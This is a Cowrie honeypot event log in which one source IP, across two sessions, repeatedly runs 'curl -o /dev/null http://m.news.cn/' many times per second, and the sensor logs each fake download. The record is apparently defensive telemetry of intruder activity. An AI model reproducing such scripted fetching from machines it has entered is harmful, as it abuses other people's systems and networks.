{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.670147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.694907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.696014Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.699102Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.700796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.701700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.735272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.736585Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.739743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.741140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.746562Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.764794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.773612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.781030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.781931Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.784329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.785221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.808043Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.818566Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.827005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.827897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.830309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.831167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.844031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.867817Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.868778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.872576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.873494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.885476Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.893117Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.901370Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.912791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.913648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.918547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.919317Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.921220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.956349Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.957272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.961672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.962566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.970147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.996483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.998023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.999765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.000548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.005461Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.040787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.041902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.043100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.046328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.047158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.054204Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.056534Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.065516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.083046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.083977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.087382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.088073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.095912Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.097505Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.125926Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.126821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.129078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.130898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.136576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.138607Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.159448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.167289Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.168957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.170001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.172632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.173547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.192136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.208568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.209650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.211675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.212566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.217981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.241474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.246023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.247121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.250169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.251355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.272206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
